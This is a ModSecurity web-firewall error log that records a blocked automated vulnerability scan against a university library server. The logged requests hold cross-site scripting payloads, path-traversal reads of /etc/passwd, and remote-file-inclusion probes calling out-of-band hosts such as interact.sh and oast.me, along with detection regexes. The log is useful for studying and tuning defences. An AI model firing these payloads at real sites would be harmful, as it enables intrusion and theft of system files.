[Tue Aug 29 11:54:00.620201 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAowNuIAAAAH"]
[Tue Aug 29 11:54:00.651313 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApHRYEAAAAP"]
[Tue Aug 29 11:54:01.641121 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApHRYMAAAAP"]
[Tue Aug 29 11:54:02.631807 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAowNusAAAAH"]
[Tue Aug 29 11:54:04.654839 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAowNv4AAAAH"]
[Tue Aug 29 11:54:04.742765 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAoZ6W4AAAAK"]
[Tue Aug 29 11:54:07.729458 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO1578Co-f0AAApLWoIAAAAI"]
[Tue Aug 29 11:54:08.546072 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApV2ygAAAAJ"]
[Tue Aug 29 11:54:09.747405 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApa-BYAAAAg"]
[Tue Aug 29 11:54:10.646997 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zQAAAAJ"]
[Tue Aug 29 11:54:11.537401 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApWY1QAAAAM"]
[Tue Aug 29 11:54:12.870114 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0pz6busfrc7yh6.oast.site found within TX:1: cjmnijtjmimvgniikdb0pz6busfrc7yh6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApgAxwAAAAH"]
[Tue Aug 29 11:54:14.103073 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAolKfwAAAAe"]
[Tue Aug 29 11:54:14.159630 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApa-BwAAAAg"]
[Tue Aug 29 11:54:14.603423 2023] [:error] [pid 2653] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApd2GAAAAAi"]
[Tue Aug 29 11:54:14.682003 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApmXs0AAAAp"]
[Tue Aug 29 11:54:15.545535 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApa-CIAAAAg"]
[Tue Aug 29 11:54:16.599313 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApmXtUAAAAp"]
[Tue Aug 29 11:54:16.699169 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAoZ6a8AAAAK"]
[Tue Aug 29 11:54:20.969098 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAolKhMAAAAe"]
[Tue Aug 29 11:54:21.066301 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAAoZ6cIAAAAK"]
[Tue Aug 29 11:54:21.551256 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAor7ukAAAAk"]
[Tue Aug 29 11:54:22.884153 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAoZ6cwAAAAK"]
[Tue Aug 29 11:54:23.574478 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApV214AAAAJ"]
[Tue Aug 29 11:54:25.282765 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAph8vwAAAAj"]
[Tue Aug 29 11:54:26.992720 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAnHQxcAAAAT"]
[Tue Aug 29 11:54:27.048445 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAph8wsAAAAj"]
[Tue Aug 29 11:54:27.573656 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqdbk8AAAAw"]
[Tue Aug 29 11:54:29.744560 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqb-pYAAAAu"]
[Tue Aug 29 11:54:30.537461 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAAoz764AAAAS"]
[Tue Aug 29 11:54:31.670766 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqUB2AAAAAb"]
[Tue Aug 29 11:54:32.667763 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqdbloAAAAw"]
